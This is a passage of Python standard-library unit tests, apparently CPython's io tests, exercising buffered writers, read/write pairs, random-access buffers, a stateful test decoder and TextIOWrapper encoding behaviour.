self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it would end up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
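# getstate()/setstate() below pack the decoder state into the (buffer, flags)
# pair expected of an incremental decoder: both counters are capped at 99,
# XOR-ed with 1 (so that a freshly reset decoder reports flags == 0, as the
# inline comment notes), and combined into a single integer as i*100 + o.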
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
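# Illustrative walk-through, mirroring the test cases below: once the test
# decoder is enabled, b'i.o6.x.xyz.' first switches to variable-length input
# (I=0), then sets the output width to 6 (O=6), and finally emits each
# period-terminated word padded with hyphens, giving 'x-----.xyz---.'.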
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# Try to get a user-preferred encoding different from the current
# locale encoding, to check that TextIOWrapper() uses the current
# locale encoding and not the user-preferred encoding.
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
